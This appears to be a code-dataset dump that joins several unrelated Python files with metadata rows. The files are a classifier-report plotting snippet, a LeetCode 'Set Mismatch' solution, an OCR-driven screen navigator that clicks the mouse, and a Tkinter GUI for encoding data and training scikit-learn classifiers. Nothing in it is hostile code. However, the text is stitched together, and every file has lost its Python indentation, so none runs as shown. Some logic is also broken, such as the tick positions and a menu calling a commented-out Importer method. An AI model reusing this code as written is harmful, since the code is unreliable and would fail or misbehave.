fig.set_figwidth(10)
for i in range(0, len(plot_class)):
c = plot_class[i]
x = plot_bar[i]
plt.barh(c, x, )
plt.title("测试集错误分类")
y_true = np.array(labels)
y_pred = np.array(y_pred)
# 最多显示分类错误的30个分类
if len(classes) <= 30:
# 创建混淆矩阵
cm = confusion_matrix(y_true, y_pred)
length = len(classes)
if length < 8:
fig_width = 8
fig_height = 8
else:
fig_width = int(length * 0.5)
fig_height = int(length * 0.5)
plt.figure(figsize=(fig_width, fig_height))
plt.xticks(np.array(length) + 0.5, classes, rotation=90)
plt.yticks(np.array(length) + 0.5, classes, rotation=0)
plt.xlabel("预测的")
plt.ylabel("真实的")
plt.title("混淆矩阵")
plt.show()
clr = classification_report(y_true, y_pred, target_names=classes)
print("Classification Report:\n----------------------\n", clr) | NCcoco/kaggle-project | Bird-Species/util/report_util.py | report_util.py | py | 5,677 | python | en | code | 0 | github-code | 13 |
42447226254 | def find_error_nums(nums: list[int]):
range_list = set(list(range(1, len(nums)+1)))
set_nums = set(nums)
result_list = []
result_list.extend(set([i for i in nums if nums.count(i) > 1]))
for i in range_list:
if i not in set_nums:
result_list.append(i)
return result_list
print(find_error_nums([1, 2, 2, 4]))
print(find_error_nums([1, 1]))
| Dimaaap/Leetcode | Easy/645.) Set Mismatch.py | 645.) Set Mismatch.py | py | 385 | python | en | code | 0 | github-code | 13 |
28248341016 | import pyautogui
import editdistance
import pyscreenshot as ImageGrab
import win32api, win32con
from gui.wxpython_gui import WxPythonGUI
from ocr.tesseract import TesseractEngine
class Navigator:
def __init__(self):
self.current_gui = WxPythonGUI
self.current_ocr_engine = TesseractEngine
self.minimum_word_similarity = 0.90
self.currently_highlighted_term = None
self.ocr_engine_instance = self.current_ocr_engine.initialize()
pass
def start(self):
image_path = self._take_screenshot()
self.ocr_results = self.ocr_engine_instance.get_ocr_results(image_path)
self.gui_instance = self.current_gui.initialize()
self.gui_instance.add_callback("search_term_change", self._search_term_changed)
self.gui_instance.add_callback("click_term", self._click_highlighted_term)
self.gui_instance.start()
def _click_highlighted_term(self):
"""
Called when user signals that they want the mouse to click the currently highlighted term.
"""
if self.currently_highlighted_term:
self.gui_instance.exit()
print("Clicking: ", self.currently_highlighted_term)
# current_x, current_y = pyautogui.displayMousePosition()
x,y = self.currently_highlighted_term[1][0:2]
x, y = int(x), int(y)
win32api.SetCursorPos((x, y))
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, x, y, 0, 0)
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, x, y, 0, 0)
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, x, y, 0, 0)
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, x, y, 0, 0)
def _match_term_to_results_with_levenshtein(self, current_search_term, ocr_results):
"""
Given a list of (word, position) pairs, matches the words to current search term.
Uses levenshtein distance to match the term and a threshold. Assumes the ocr results are
returned in the order they're seen on the screen, so all results that contain the same similarity score
will just be sorted by that order.
"""
possible_matches = []
for result in ocr_results:
ocr_result_word = result[0]
distance = editdistance.eval(current_search_term, ocr_result_word)
similarity = 1 - distance / max(len(ocr_result_word), len(current_search_term))
if similarity > self.minimum_word_similarity:
possible_matches.append(result)
return possible_matches
def _match_term_to_results(self, current_search_term, ocr_results):
"""
Given a list of (word, position) pairs, attempts to find if the current search therm appears somewhere in them
and highlights that portion of said word/term.
"""
possible_matches = []
for result in ocr_results:
ocr_result_word = result[0].lower()
if current_search_term in ocr_result_word:
possible_matches.append(result)
return possible_matches
def _search_term_changed(self):
current_search_term = self.gui_instance.get_search_term()
if not current_search_term.strip(): return
# For now, assuming that the data is ready
possible_matches_contains = self._match_term_to_results(current_search_term, self.ocr_results)
possible_matches_lev = self._match_term_to_results_with_levenshtein(current_search_term, self.ocr_results)
possible_matches = possible_matches_contains + possible_matches_lev
# TODO: remember current position and allow passing through different matches
if possible_matches:
self.currently_highlighted_term = possible_matches[0]
self.gui_instance.highlight_term(possible_matches[0])
else:
self.gui_instance.remove_highlights()
def _take_screenshot(self):
"""
Takes a screenshot of current screen.
"""
# For now, loading a placeholder image.
im = ImageGrab.grab()
im.save('crnt.png')
return 'crnt.png'
if __name__ == "__main__":
n = Navigator()
n.start()
| avjves/TypeNavi | run.py | run.py | py | 4,223 | python | en | code | 1 | github-code | 13 |
32859057689 | import pandas as pd
import numpy as np
from tkinter import ttk
from tkinter.filedialog import *
import tkinter.scrolledtext as st
from tkinter import *
from pandas.api.types import is_string_dtype
from pandas.api.types import is_numeric_dtype
import matplotlib.pyplot as plt
from sklearn.preprocessing import OneHotEncoder, OrdinalEncoder
from sklearn.model_selection import train_test_split, GridSearchCV, StratifiedKFold
from sklearn.cluster import KMeans
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn import svm
from sklearn.naive_bayes import GaussianNB
from pandas.api.types import is_string_dtype
import matplotlib
matplotlib.use('TkAgg')
import numpy as np
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
def interacetow(df):
global liste_of_selected_item
global liste_percentage
global liste
liste=(df.columns.values).tolist()
# ==================================================================================================
# ==================================================================================================
global list_selected
list_selected=[]
def second_window(df):
def event_btn():
if len(list_selected) != 0:
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,list_selected)
window.destroy()
else:
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END, "you have to choose input first")
def entryselected():
global list_selected
list_selected = [listNodes.get(i) for i in listNodes.curselection()]
selectedoutput.delete('1.0','100.0')
selectedoutput.insert(END, "\n")
for i in list_selected :
selectedoutput.insert(END,i)
selectedoutput.insert(END,"\n")
window = Toplevel()
window.geometry("500x450")
window.title("choose input")
frame = Frame(window, width=250, height=250, borderwidth=2, relief=GROOVE, background="gray35" )
frame.place(x=10,y=50)
label2 = Label(window, text="Input", font=("Arial Black",15), foreground="gray35")
label2.place(x=60, y=10)
label2 = Label(window, text="Input Chosen", font=("Arial Black",15), foreground="gray35")
label2.place(x=280, y=10)
v=StringVar()
listNodes = Listbox(frame,listvariable=v, width=20, height=15, font=("Helvetica", 12), selectmode=MULTIPLE)
liste =(df.columns.values).tolist()
j=1
for i in liste:
listNodes.insert(j, i)
j=j+1
listNodes.pack(side="left", fill="y")
scrollbar = Scrollbar(frame, orient="vertical")
scrollbar.config(command=listNodes.yview)
scrollbar.pack(side="right", fill="y")
listNodes.config(yscrollcommand=scrollbar.set)
canvas3 = Canvas(window, width=200, height=280, background="gray80", borderwidth=2, relief=GROOVE)
selectedoutput = st.ScrolledText(canvas3, width=27, height=18, background="white" ,font=("arial ",10))
selectedoutput.place(x=2, y=0)
canvas3.place(x=250,y=50)
bouton3 = ttk.Button(window, text="submit", width=8,command=entryselected)
bouton3.place(x=150, y=380)
bouton3 = ttk.Button(window, text="OK", width=8,command=event_btn)
bouton3.place(x=250, y=380)
window.mainloop()
# ==================================== SSVVMM ==============================================================
global kernel
global degree_liste
degree_liste=[]
global gamma_liste
gamma_liste=[]
global coef0_liste
coef0_liste=[]
global C_liste
C_liste=[]
global df_init
#==============================================================================
# =============================================================================
class Model:
def __init__(self):
self.df_init = df.copy()
self.df = df.dropna().reset_index().drop(['index'],axis=1)
self.df_cod = self.df.copy()
self.df_finale = df.copy()
self.df_Result_liste = []
self.model_liste = []
self.sc_moyenne_liste = []
self.std_liste = []
self.col_dict={}
self.date_liste=[]
self.df_test=[]
self.input=[]
"""
def Importer(self):
global liste
filename = askopenfilename(title="Ouvrir un fichier",filetypes=[('csv files','.csv'),
("Excel file","*.xlsx"),("Excel file 97-2003","*.xls")])
df = pd.read_excel(filename)
df["Index"] = [x for x in range(1, len(df.values)+1)]
df =df[ ['Index'] + [ col for col in df.columns if col != 'Index' ] ]
console.delete('4.0','100.0')
console.insert(END, "\n")
console.insert(END, "Le fichier est ouvert\n")
self.df_init = df.copy()
self.df = df.dropna().reset_index().drop(['index'],axis=1)
self.df_cod = self.df.copy()
self.df_finale = df.copy()
self.update()
"""
# ========================================================================================================
def Afficher_Table(self,df):
try:
if((df.shape[0] ==0) and (df.shape[1]==0)):
console.insert(END, "Please open a file first \n")
nb_colomns = df.shape[1]
aray = np.arange(1,nb_colomns+1)
tupl=tuple(aray)
tree = ttk.Treeview(fenetre, columns = tupl, height = 5 , show ="headings")
tree.place(x=260, y=3, width=545 , height=420)
# Add scrollbar
vsb1 = ttk.Scrollbar(fenetre , orient="vertical",command=tree.yview)
vsb1.place(x=805, y=3, height=420)
tree.configure(yscrollcommand=vsb1.set)
vsb2 = ttk.Scrollbar(fenetre , orient="horizontal",command=tree.xview)
vsb2.place(x=260, y=410, width=560)
tree.configure(yscrollcommand=vsb1.set, xscrollcommand=vsb2.set)
# Add headings
i=1
for name_attr in df.columns:
tree.heading(i, text = name_attr)
i=i+1
# Define column width
for i in range(1,nb_colomns+1):
tree.column(i, width = 80)
for index in range(0,df.shape[0]):
enrg = list(df.values[index,])
tree.insert('', END, value= enrg)
console.delete('3.0','100.0')
console.insert(END, "\n")
n1=df.shape[0]
n2=df.shape[1]
console.insert(END,"Number of lines : "+str(n1)+"\n")
console.insert(END,"Nombre of colonnes : "+str(n2)+"\n")
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Table is not exist yet \n")
def Codding(self):
valueDVEncode = str( DVEncode.get())
valueEncoderT = str( EncoderT.get())
col=valueDVEncode
choix=valueEncoderT
self.col_dict[col]= choix
try:
if(is_string_dtype(df[col])):
if(choix=="OneHotEncoder"):
OneHotEncoding = OneHotEncoder(handle_unknown="ignore")
a = OneHotEncoding.fit_transform(self.df[[col]]).astype(int)
liste = []
liste = [col+'_'+str(i) for i in range(self.df[col].unique().shape[0])]
other = pd.DataFrame(data=a.toarray(),columns=liste)
self.df_cod = pd.concat([self.df_cod,other],axis=1)
if(choix=="OneLabelEncoder"):
OrdinalEncoding = OrdinalEncoder()
other = OrdinalEncoding.fit_transform(self.df[[col]]).astype(int)
other = pd.DataFrame(other, columns=[col+'_'+'Num'])
self.df_cod = pd.concat([self.df_cod,other],axis=1)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the variable is successfully converted \n ")
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,"variable :"+col+"\n")
parachoisir.insert(END,"encoding type :"+choix+"\n")
else:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the variable is of type int \n")
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error! variable not exists \n ")
self.update()
self.Afficher_Table(self.df_cod)
def update(self):
global liste
liste =(self.df_cod.columns.values).tolist()
DVEncode["value"] =liste
DVEncode.current(0)
DateVar["value"] =liste
DateVar.current(0)
Output["value"] =liste
Output.current(0)
corrterget["value"] =liste
corrterget.current(0)
def Transforme_DATE(self,df,df_cod,col):
liste_1 = []
liste_2 = []
liste_3 = []
from datetime import datetime
for i in range(df.shape[0]):
date = df[col].iloc[i]
y = date.year
m = date.month
d = date.day
liste_1.append(y)
liste_2.append(m)
liste_3.append(d)
y = pd.Series(liste_1)
m = pd.Series(liste_2)
d = pd.Series(liste_3)
df_date = pd.concat([y,m,d],axis=1)
df_date.columns = ['year','month','day']
df_cod = pd.concat([df_cod,df_date],axis=1)
return df_cod
def Transforme_DATE_Train(self):
try:
valueDateVar = str( DateVar.get())
col=valueDateVar
self.date_liste.append(col)
self.df_cod= self.Transforme_DATE(self.df,self.df_cod,col)
self.Afficher_Table(self.df_cod)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Date variable is successfully converted \n ")
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,"Date variable :"+valueDateVar+"\n")
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END," Error: variable chosen not of type Date \n ")
def Codding_Test(self,col,choix=0):
if(choix==1):
OneHotEncoding = OneHotEncoder(handle_unknown="ignore")
OneHotEncoding.fit(self.df[[col]])
a = OneHotEncoding.transform(self.df_test[[col]]).astype(int)
liste = []
liste = [col+'_'+str(i) for i in range(self.df[col].unique().shape[0])]
other = pd.DataFrame(data=a.toarray(),columns=liste)
self.df_test = pd.concat([self.df_test,other],axis=1)
if(choix==0):
OrdinalEncoding = OrdinalEncoder()
OrdinalEncoding.fit(self.df[[col]])
other = OrdinalEncoding.transform(self.df_test[[col]]).astype(int)
other = pd.DataFrame(other, columns=[col+'_'+'Num'])
self.df_test = pd.concat([self.df_test,other],axis=1)
console.insert(END, "\n")
console.insert(END,"the test variable is successfully converted \n ")
a = self.df_test[self.col_y]
self.df_test = self.df_test.drop([self.col_y],axis=1)
self.df_test[self.col_y] = a
def Transforme_DATE_Test(self,col):
self.df_test = self.Transforme_DATE(self.df_test,self.df_test,col)
console.insert(END, "\n")
console.insert(END,"the test date variable is converter with success \n ")
a = self.df_test[self.col_y]
self.df_test = self.df_test.drop([self.col_y],axis=1)
self.df_test[self.col_y] = a
def Correlation_Variable(self):
try :
Valuecorrterget=str( corrterget.get())
corr = self.df_cod.corr()[Valuecorrterget].drop([Valuecorrterget],axis=0)
x = corr.index
fig=plt.figure(2,figsize=(9,7))
fig=plt.barh(x, corr)
fig=plt.show()
canvas = FigureCanvasTkAgg(fig, master=fenetre)
canvas.get_tk_widget().pack()
canvas.draw()
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Graphical visualization of the correlation of \n variables with the variable target :"+Valuecorrterget+" \n ")
except :
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error !! choose Numerical Variable \n ")
def Selection_fetcher(self):
# global liste_of_selected_item
#ValueInput=str(Input.get())
global list_selected
ValueOutput=str(Output.get())
#cols_X=liste_of_selected_item
cols_X=list_selected
col_y =ValueOutput
df_test = self.df_init[self.df_init.isnull()[col_y]].reset_index().drop(['index'],axis=1)
self.df_test = df_test.drop([col_y],axis=1)
self.df_test[col_y] = df_test[col_y]
self.df_test_y = self.df_test.copy()
self.col_y = col_y
self.cols_X= list_selected
for col in self.col_dict.keys():
if(self.col_dict[col]=="OneLabelEncoder"):
self.Codding_Test(col,0)
else :
self.Codding_Test(col,1)
for col in self.date_liste:
self.Transforme_DATE_Test(col)
self.y = self.df_cod[col_y].copy()
self.X = self.df_cod[cols_X].copy()
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END, "features chosen to build the model are :\n")
parachoisir.insert(END, cols_X)
parachoisir.insert(END, "\n target est :\n")
parachoisir.insert(END, col_y)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"variables are successfully selected \n" )
def Déscritiser(self):
#try :
n_clusters=int(entree_2.get())
self.n_clusters = n_clusters
target_array = np.array(self.y).reshape(-1, 1)
k_means = KMeans(init='k-means++', n_clusters=n_clusters)
y = k_means.fit_predict(target_array)
self.target = self.y
self.y = pd.DataFrame(y,columns=['y'])
self.table = pd.concat([self.df_cod,self.y],axis=1)
self.Afficher_Table(self.table)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"discretization is successfully completed \n" )
# Visualisation ************************************************************************************************************************
def Choix_Parametre_listes(self):
global liste_percentage
name=str(ModelT.get())
self.algorithme_att = name
pourc_liste=liste_percentage
pourc_liste = np.array(pourc_liste)
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,"choosen Model :"+ name +"\n")
parachoisir.insert(END,"pourcentage % : ")
parachoisir.insert(END,pourc_liste)
pourc_liste=[i/100 for i in pourc_liste]
self.pc_liste_att =pourc_liste
if(self.algorithme_att=='svm'):
# kernel, degree_liste, gamma_liste, coef0_liste, C_liste = parametre_svm()
kernel='rbf'
self.kernel = kernel
self.kernel = kernel
degree_liste = [3]
coef0_liste = [0]
gamma_liste = [0.1,0.01,0.001,'scale']
C_liste = [1]
if(kernel=='rbf'):
param_dict = {'gamma': gamma_liste, 'C': C_liste}
if(kernel=='poly'):
param_dict = {'degree': degree_liste, 'coef0': coef0_liste, 'C': C_liste}
if(kernel=='sigmoid'):
param_dict = {'gamma': gamma_liste, 'coef0': coef0_liste, 'C': C_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = svm.SVC(kernel=kernel, gamma='scale')
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
if(self.algorithme_att=='DecisionTree'):
#max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_DecisionTree()
max_depth_liste = [1,2,3]
min_samples_leaf_liste = [1,2,3]
min_samples_split_liste = [2,3]
param_dict = {'max_depth': max_depth_liste, 'min_samples_leaf': min_samples_leaf_liste, 'min_samples_split': min_samples_split_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = DecisionTreeClassifier()
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
if(self.algorithme_att=='KNeighbors'):
#n_neighbors_liste, p_liste, weights_liste = parametre_KNeighbors()
n_neighbors_liste = [4,5]
p_liste = [1,2]
weights_liste = ['uniform']
param_dict = {'n_neighbors': n_neighbors_liste, 'p': p_liste, 'weights': weights_liste}
param_dict = {'n_neighbors': n_neighbors_liste, 'p': p_liste, 'weights': weights_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = KNeighborsClassifier()
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
if(self.algorithme_att=='RandomForest'):
#n_estimators, max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_RandomForest()
n_estimators_liste = [100]
max_depth_liste = [None,1,2,3]
min_samples_split_liste = [2,3]
min_samples_leaf_liste = [1,2,3]
param_dict = {'n_estimators': n_estimators_liste, 'max_depth': max_depth_liste, 'min_samples_split': min_samples_split_liste, 'min_samples_leaf':min_samples_leaf_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = RandomForestClassifier()
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"configuration of parameters is successfully completed\n" )
def Entrainer_listes(self):
if(self.algorithme_att=='svm'):
self.grid_model.fit(self.X,self.y)
if(self.kernel=='rbf'):
p1 = self.grid_model.best_params_['gamma']
p2 = self.grid_model.best_params_['C']
model = svm.SVC(kernel=self.kernel, gamma=p1, C=p2)
if(self.kernel=='poly'):
p1 = self.grid_model.best_params_['degree']
p2 = self.grid_model.best_params_['C']
p3 = self.grid_model.best_params_['coef0']
model = svm.SVC(kernel=self.kernel, degree=p1, C=p2, coef0=p3, gamma='scale')
if(self.kernel=='sigmoid'):
p1 = self.grid_model.best_params_['gamma']
p2 = self.grid_model.best_params_['C']
p3 = self.grid_model.best_params_['coef0']
model = svm.SVC(kernel=self.kernel, gamma=p1, C=p2, coef0=p3)
if(self.algorithme_att=='DecisionTree'):
self.grid_model.fit(self.X,self.y)
p1 = self.grid_model.best_params_['max_depth']
p2 = self.grid_model.best_params_['min_samples_leaf']
p3 = self.grid_model.best_params_['min_samples_split']
model = DecisionTreeClassifier(max_depth = p1, min_samples_leaf = p2, min_samples_split = p3)
if(self.algorithme_att=='KNeighbors'):
self.grid_model.fit(self.X,self.y)
p1 = self.grid_model.best_params_['n_neighbors']
p2 = self.grid_model.best_params_['p']
p3 = self.grid_model.best_params_['weights']
model = KNeighborsClassifier(n_neighbors = p1, p = p2, weights = p3)
if(self.algorithme_att=='RandomForest'):
self.grid_model.fit(self.X,self.y)
p1 = self.grid_model.best_params_['n_estimators']
p2 = self.grid_model.best_params_['max_depth']
p3 = self.grid_model.best_params_['min_samples_split']
p4 = self.grid_model.best_params_['min_samples_leaf']
model = RandomForestClassifier(n_estimators = p1, max_depth = p2, min_samples_split = p3, min_samples_leaf = p4)
if(self.algorithme_att=='Bayes'):
model = GaussianNB()
l = []
sc_train_liste = []
sc_test_liste = []
for pc in self.pc_liste_att:
X_train, X_test, y_train, y_test = train_test_split(self.X, self.y, test_size=pc, random_state=0)
#np.ravel(y_train,order='C')
model.fit(X_train,y_train)
sc_train = model.score(X_train,y_train)
sc_test = model.score(X_test,y_test)
sc_train_liste.append(sc_train)
sc_test_liste.append(sc_test)
l.append(str(int(pc*100))+" %")
l1 = np.round(sc_train_liste,2)
l2 = np.round(sc_test_liste,2)
df_att = pd.DataFrame({'train':l1, 'test':l2,}, index = l)
std = round(df_att['test'].std(),2)
sc_moy = round(df_att['test'].mean(),2)
self.sc_moyenne_liste.append(sc_moy)
self.std_liste.append(std)
self.model_liste.append(model)
self.df_Result_liste.append(df_att)
canvaResult = Canvas(fenetre, width=560, height=420, background="white",
borderwidth=2, relief=GROOVE)
resul = st.ScrolledText(canvaResult, width=200, height=70, background="white" ,font=("arial ",11))
resul.insert('1.0', "\t\t\t\t Result :\n")
resul.insert(END, "\t\t ******************************************************\n\n")
resul.insert(END,model)
resul.insert(END, "\n\n")
resul.insert(END,df_att)
resul.focus()
resul.configure(state ='disabled')
resul.place(x=0, y=0)
canvaResult.place(x=257, y=0)
#print(model,"\n")
#print(df_att)
#print("\n La moyenne des scores de test :",sc_moy)
#print("La variance entre les données :",std)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the Model is being training")
score.delete('4.0','100.0')
score.insert(END, "\n")
score.insert(END,"AVG test : ")
score.insert(END,sc_moy)
score.insert(END, "\n")
score.insert(END,"STD test :")
score.insert(END,std)
def Comparer_Visualiser(self):
try:
canvaResult = Canvas(fenetre, width=560, height=420, background=canva_color2,
borderwidth=2, relief=GROOVE)
resul = st.ScrolledText(canvaResult, background="white" ,font=("arial ",11))
resul.insert('1.0', "\t\t\t\t Result :\n")
resul.insert(END, "\t\t ******************************************************\n\n")
for i in range(len(self.model_liste)):
#print("Le model",i+1,":")*
j=i+1
resul.insert(END, " Model : ")
resul.insert(END, j )
resul.insert(END, "\n")
#print("********************************************************************************************************** ")
resul.insert(END, " ************************************************************************")
resul.insert(END, "\n")
#print(self.model_liste[i],"\n")
resul.insert(END,self.model_liste[i])
resul.insert(END, "\n")
#print(self.df_Result_liste[i])
resul.insert(END,self.df_Result_liste[i])
resul.insert(END, "\n")
#print("\nLa moyenne des scores de test :",self.sc_moyenne_liste[i])
resul.insert(END,"tests AVG : ")
resul.insert(END, "\n")
resul.insert(END,self.sc_moyenne_liste[i])
resul.insert(END, "\n")
#print("La variance entre les données :",self.std_liste[i],"\n")
resul.insert(END,"tests STD : ")
resul.insert(END, "\n")
resul.insert(END,self.std_liste[i])
resul.insert(END, "\n")
resul.focus()
resul.configure(state ='disabled')
resul.place(x=0, y=0)
canvaResult.place(x=257, y=0)
x = [i for i in range(1,len(self.std_liste)+1)]
y1 = self.sc_moyenne_liste
y2 = self.std_liste
fig=plt.figure(1,figsize=(15,5))
fig=plt.subplot(1,2,1)
fig=plt.title("Avg Sccor")
fig=plt.ylabel(" AVG Accurcy ")
fig=plt.plot(x,y1, 'ro-', label="Model")
fig=plt.legend()
fig=plt.show()
fig=plt.subplot(1,2,2)
fig=plt.title("Std Sccor")
fig=plt.ylabel("STD Accurcy")
fig=plt.plot(x,y2, 'o-', label="Model")
fig=plt.legend()
fig=plt.show()
canvas = FigureCanvasTkAgg(fig, master=fenetre)
canvas.get_tk_widget().pack()
canvas.draw()
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error compare the model is failed!")
# Le model *****************************************************************************************************************************
def Choix_Parametre(self):
try:
name=str(Modelchoi.get())
self.algorithme= name
if(self.algorithme=='svm'):
#kernel, degree_liste, gamma_liste, coef0_liste, C_liste = parametre_svm()
C = 1
kernel = 'rbf'
degree = 3
coef0 = 0
gamma = 'scale'
self.model = svm.SVC(kernel=kernel, degree=degree, gamma=gamma, coef0=coef0, C=C)
if(self.algorithme=='DecisionTree'):
#max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_DecisionTree()
max_depth = None
min_samples_leaf = 1
min_samples_split = 2
self.model = DecisionTreeClassifier(max_depth=max_depth, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)
if(self.algorithme=='KNeighbors'):
#n_neighbors_liste, p_liste, weights_liste = parametre_KNeighbors()
n_neighbors = 5
p = 2
weights = 'uniform'
self.model = KNeighborsClassifier(n_neighbors=n_neighbors, p=p, weights=weights)
if(self.algorithme=='Bayes'):
self.model = GaussianNB()
if(self.algorithme=='RandomForest'):
#n_estimators, max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_RandomForest()
n_estimators = 100
max_depth = None
min_samples_split = 2
min_samples_leaf = 1
self.model = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf)
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END," The chosen model is : ")
parachoisir.insert(END, "\n")
parachoisir.insert(END,name)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the train model is successfully configured \n" )
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error in the train model phase !! \n" )
def Entrainer(self):
self.model.fit(self.X,self.y)
def Tester(self):
self.Entrainer()
sc = self.model.score(self.X,self.y)
sc = round(sc,2)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END," The training is over \n")
console.insert(END, "\n")
console.insert(END," The test on all of the data: \n")
score.delete('4.0','100.0')
score.insert(END, "\n")
score.insert(END," Accurcy ")
score.insert(END, "\n")
score.insert(END,sc)
score.insert(END, " %")
# Appliquer ****************************************************************************************************************************
def Appliquer(self):
console.delete('3.0','100.0')
console.insert(END,"\n")
console.insert(END," model application")
console.insert(END,"\n")
self.X_test_finale = self.df_test[self.cols_X].copy()
y_predict = self.model.predict(self.X_test_finale)
y_predict = pd.DataFrame(y_predict,columns=['y'])
self.df_test_y = pd.concat([self.df_test,y_predict],axis=1)
self.Afficher_Table(self.df_test_y)
console.insert(END," the model is successfully applied")
def Remplire(self):
df = pd.concat([self.target,self.y],axis=1)
m = []
m = [round(df[df['y']==k][self.col_y].mean(),2) for k in range(self.n_clusters)]
self.df_m = pd.DataFrame(m,columns=['mean'])
for i in range(self.df_test.shape[0]):
y = self.df_test_y['y'].iloc[i]
self.df_test_y.loc[i,self.col_y] = self.df_m.loc[y,'mean']
self.Afficher_Table(self.df_test_y)
console.delete('3.0','100.0')
console.insert(END,"\n")
console.insert(END," the target is well Fill")
def Sauvgarder(self):
df_y = self.df_test_y.copy()
df_y.index = self.df_finale[self.df_finale.isnull()[self.col_y]].index
for i in df_y.index:
self.df_finale.loc[i,self.col_y] = df_y.loc[i,self.col_y]
self.Afficher_Table(self.df_finale)
self.df_finale.to_csv('out.csv', index=False)
console.delete('3.0','100.0')
console.insert(END,"\n")
console.insert(END," the target is well Fill")
Model = Model()
#liste =(df.columns.values).tolist()
canva_color2 = "#FCFCFC"
global colname
global rowname
global L_combobox
# ****************************************************************************************************************************
def about_us():
mess1="\t \t \t DATA QUALITY \n "
mess="about us : \n \n DataQuality App for Educatif porpuse "
#messagebox.showinfo(title="Aout Us", message=mess)
fenetrea = Tk()
fenetrea.resizable(width=False, height=False)
fenetrea.title("About Us")
fenetrea.geometry("800x500")
canvas2a = Canvas(fenetrea, width=750, height=450, background="white", borderwidth=2, relief=GROOVE)
canvas2a.place(x=20,y=20)
text=Text(canvas2a,width=68,height=21,font=("Arial",14),background="gray95",foreground="black")
#text = st.ScrolledText(canvas2)
text.place(x=20,y=2000)
text.pack()
text.config(state="normal")
text.insert(END, mess1)
text.insert(END, mess)
fenetrea.mainloop()
#df=pd.read_excel("employe.xlsx")
# fentre tow ---------------------------------------------------------------------------------
fenetre = Tk()
#class begiin
#-----------------------------------
bouton_color = "#DEDEDE"
fenetre.title("DATA QUALITY")
fenetre.geometry("1080x650")
# fenetre.iconbitmap("Logo.ico")
fenetre.resizable(width=False, height=False)
# Menu
menu_G = Menu(fenetre)
fenetre.config(menu=menu_G)
menu1 = Menu(menu_G, tearoff=0)
menub = Menu(menu_G, tearoff=0)
menu_G.add_cascade(label="File", menu=menu1)
menu1.add_command(label="Import", command=lambda:Model.Importer())
menu1.add_separator()
menu1.add_command(label="Exit", command=fenetre.destroy)
menu_G.add_cascade(label="About us ", menu=menub)
menub.add_command(label="G.info", command=about_us)
#-------------------------------------------------------------------------------------------------
def userText(event):
entree_1.delete(0,END)
usercheck=True
def userTextb(event):
entree_2.delete(0,END)
usercheck=True
liste_of_selected_item=[]
def selceted(event):
global liste_of_selected_item
sele =Input.get()
if(sele in liste_of_selected_item):
liste_of_selected_item.remove(sele)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END," delted :\n")
else:
liste_of_selected_item.append(sele)
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,liste_of_selected_item)
liste_percentage=[]
def pourcentage_selceted(event):
global liste_percentage
sele =float(testpercentage.get())
if(sele in liste_percentage):
liste_percentage.remove(sele)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END," delted :\n")
else:
liste_percentage.append(sele)
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,liste_percentage)
def checkcmbo():
value = str( L_combobox.get())
fildir.insert(0 ,value)
def config():
pass
def test():
pass
def fonc(event):
pass
bouton_text_size1 = 10
# Variable encoding ----------------------------------------------------------------------------------------
frame1 = Frame(fenetre, width=250, height=251, borderwidth=2, relief=GROOVE, background="gray35" )
# Label
label2 = Label(frame1, text="Variable Encoding", font=("Arial Black",15), background="gray35",foreground="White Smoke")
label2.place(x=16, y=3)
